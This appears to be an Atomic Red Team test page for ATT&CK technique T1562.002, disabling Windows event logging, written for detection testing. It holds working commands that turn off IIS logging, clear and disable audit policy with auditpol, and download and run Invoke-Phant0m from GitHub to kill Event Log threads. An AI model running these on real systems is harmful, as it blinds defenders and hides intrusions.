T1562.002.md

T1562.002 - Disable Windows Event Logging

Description from ATT&CK

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.

Adversaries may targeting system-wide logging or just that of a particular application. By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.

Atomic Tests

• Atomic Test #1 - Disable Windows IIS HTTP Logging

• Atomic Test #2 - Kill Event Log Service Threads

• Atomic Test #3 - Impair Windows Audit Log Policy

• Atomic Test #4 - Clear Windows Audit Policy Config

Atomic Test #1 - Disable Windows IIS HTTP Logging

Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked.

Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)

Supported Platforms: Windows

Inputs:

Name	Description	Type	Default Value
website_name	The name of the website on a server	string	Default Web Site

Attack Commands: Run with powershell!

C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true

Cleanup Commands:

if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
  C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
}

Atomic Test #2 - Kill Event Log Service Threads

Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
$url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"
$output = "$env:TEMP\Invoke-Phant0m.ps1"
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
cd $env:TEMP
Import-Module .\Invoke-Phant0m.ps1
Invoke-Phant0m

Cleanup Commands:

Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red

Atomic Test #3 - Impair Windows Audit Log Policy

Disables the windows audit policy to prevent key host based telemetry being written into the event logs. Solarigate example

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

auditpol /set /category:"Account Logon" /success:disable /failure:disable
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable
auditpol /set /category:"Detailed Tracking" /success:disable

Cleanup Commands:

auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable

Atomic Test #4 - Clear Windows Audit Policy Config

Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

auditpol /clear /y
auditpol /remove /allusers

Cleanup Commands:

auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable